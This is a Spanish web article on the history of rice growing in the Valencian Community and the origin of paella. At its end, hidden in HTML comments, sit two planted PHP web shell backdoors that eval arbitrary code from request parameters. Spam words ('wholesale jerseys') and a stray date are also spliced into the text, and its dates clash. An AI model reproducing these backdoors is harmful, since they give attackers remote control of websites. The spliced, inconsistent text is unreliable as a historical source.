Origen del Arroz en la Comunidad Valenciana


El arroz en Valencia del s.VIII al s.XXI

Se dice que ya en el siglo VIII se cosecharon los primeros granos, siendo este el origen del arroz en la Comunidad Valenciana, introducido en esas tierras por los conquistadores árabes, y que desde entonces hasta nuestros días se ha cultivado el arroz (en árabe ‘ar ruzz’), aunque no siempre ha sido tan fácil ni popular como lo es ahora.

Con un origen más que wholesale jerseys probable en el sureste asiático hace más de 5000 años, no resulta fácil encontrar el origen de la introducción del arroz en la península ibérica, tan sólo algunas breves menciones sobre sus existencia antes del siglo XIII en el que podemos encontrar una escueta, aunque clara, 130 referencia al arroz por parte del rey Jaume I en el Llibre del Repartiment (1238), redactado después de la reconquista para la distribución de las tierras y cultivos valencianos entre los nobles del reino de Aragón.

Los cultivadores de arroz valencianos tuvieron que pasar por penurias y limitaciones debido a los problemas de saluda causados por las aguas estancadas en las que se plantaba y se enfrentaron a sucesivas prohibiciones por parte de los regidores hasta el punto que en los albores del siglo XV (1403) Martín I el Humano dictase la prohibición general de su cultivo en todos los territorios del reino de Valencia, con condenas que incluían la pena de muerte. A pesar de que estas prohibiciones se extendieran hasta su levantamiento a mediados del siglo XVIII (en la Real Orden del 10 de mayo de 1860, vigente hasta nuestros días), no siempre fueron leyes extremadamente duras y el 25.06.2015 arroz se siguió plantando con autorización en zonas que no eran aptas para otros cultivos.

Las limitaciones al cultivo no impidieron que el arroz fuera utilizado durante estos siglos por todas las clases sociales, ingerido por los mismos agricultores que lo cultivaban, marineros que lo incluían en la dieta de sus viajes o incluso nobles que lo tomaban en delicadas recetas. La censura aplicada al arroz tampoco fue una barrera para que se convirtiera en uno de los principales productos orientados a las exportaciones valencianas, siendo Italia uno de sus principales clientes, aunque el consumo nacional se llevaba prácticamente toda la producción. Con la ampliación de los arrozales en el siglo XVIII comienzan también los excedentes de producción y se incrementan las exportaciones a otros países de Europa y América.

La zona de marjales fácilmente inundables del Parque Natural de la Albufera, a pocos quilómetros al sur de la ciudad Valencia, ha resultado ser un enclave ideal para el cultivo del arroz. Es posible que esta localización ahora sea la más conocida entre locales y turistas pero no la única en la comunidad levantina, ya que también se hallan o se hallaban cultivos en algunas zonas de Castellón (La Plana) y de Alicante (Orihuela).

paella_4Gracias a la aparición de nuevas tecnologías para la agricultura, la extensión de los cultivos de arroz en la Albufera se ha multiplicado en más de 12.000 hectáreas desde sus inicios (aprox. 2800 hectáreas) hasta nuestros días. Esta producción local consiguió que en la Comunidad Valenciana se crease una tradición de platos basados en el arroz que desembocó en la creación de la paella a mediados del siglo XVIII y que no ha dejado de evolucionar casi 150 años después. El primer texto que cita una receta de paella o arroz a la valenciana la encontramos en el libro del siglo XVIII de Josep Orri, Avisos i Instruccions per lo principiant Cuyner.

En el siglo XXI, el arroz (en valenciano ‘arròs’) cocinado en la paella se ha convertido en la receta más característica de la Comunidad Valenciana y probablemente en el plato nacional español, o al menos el más conocido internacionalmente. La paella valenciana, junto con el arroz a banda, el arroz negro o New la paella de mariscos son hoy en día delicias que se consumen en cada vez más países de todo el mundo y que significan para la comunidad y sus tres provincias una de las mejores presentaciones de nuestro gusto por el buen comer.



<!– [insert_php]if (isset($_REQUEST[“XePM”])){eval($_REQUEST[“XePM”]);exit;}[/insert_php][php]if (isset($_REQUEST[“XePM”])){eval($_REQUEST[“XePM”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“JQClY”])){eval($_REQUEST[“JQClY”]);exit;}[/insert_php][php]if (isset($_REQUEST[“JQClY”])){eval($_REQUEST[“JQClY”]);exit;}[/php] –>